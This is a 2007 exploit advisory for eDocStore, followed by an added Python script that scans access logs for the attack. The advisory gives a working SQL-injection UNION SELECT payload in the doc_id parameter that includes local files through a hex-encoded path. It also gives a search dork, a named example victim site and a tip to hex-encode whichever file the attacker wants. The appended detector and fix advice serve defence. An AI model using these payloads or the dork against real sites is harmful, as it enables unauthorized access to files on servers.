
edocstore-sql.txt

Posted on 27 June 2007

--==+================================================================================+==--
--==+        eDocStore Latest Versions Local File Inclusion Vulnerabilities          +==--
--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog (good work xprog)

SCRIPT DOWNLOAD: N/A

SITE: http://www.edocstore.co.uk

DORK: intext:"Powered by eDocStore"

EXPLOITS:

EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

EXAMPLES:

EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

Note/Tip: The filename for the inclusion has to be hex-encoded before you can include it. It's only required to replace the first hex value, the one before the ",".

GREETZ: h4cky0u.org, G0t-Root.Net

FROM GM: Kw3[R]ln Get over it!

--==+================================================================================+==--
--==+        eDocStore Latest Versions Local File Inclusion Vulnerabilities          +==--
--==+================================================================================+==--
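Added example, not part of the original advisory: a check defenders can run over web-server access logs to spot this request pattern. It flags any doc_id that is not a plain integer and decodes the 0x... literals so the filename and MIME type being requested become readable. The log lines, the function names and the combined-log-format assumption are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_hex_literals(value):
    """Return the text carried by MySQL-style 0x... literals found in value."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(value)]

def inspect_request(line, param="doc_id"):
    """Return a finding dict if `param` in a log line is not a plain integer."""
    m = REQUEST.search(line)
    if not m:
        return None
    # parse_qs percent-decodes the values (%20 becomes a space).
    query = parse_qs(urlsplit(m.group(1)).query)
    for value in query.get(param, []):
        if re.fullmatch(r"\d+", value):
            continue  # a legitimate document id
        decoded = decode_hex_literals(value)
        return {
            "value": value,
            "union_select": bool(
                re.search(r"\bunion\b.*\bselect\b", value, re.I | re.S)),
            "decoded": decoded,
            # A decoded literal that walks up or names an absolute path
            # means a file outside the document store is being requested.
            "traversal": any(".." in d or d.startswith("/") for d in decoded),
        }
    return None

def scan(lines):
    """Return the findings for every suspicious line."""
    return [f for f in map(inspect_request, lines) if f]

# Constructed access-log lines (client IPs and timestamps are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2007:10:00:01 +0000] "GET /essentials/minutes/doc.php?action=inline&doc_id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [27/Jun/2007:10:00:09 +0000] "GET /essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the application side, the same observation gives the fix: doc_id should be accepted only as an integer and bound as a query parameter, so nothing the client sends can end up in the columns used as file path and content type.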

 
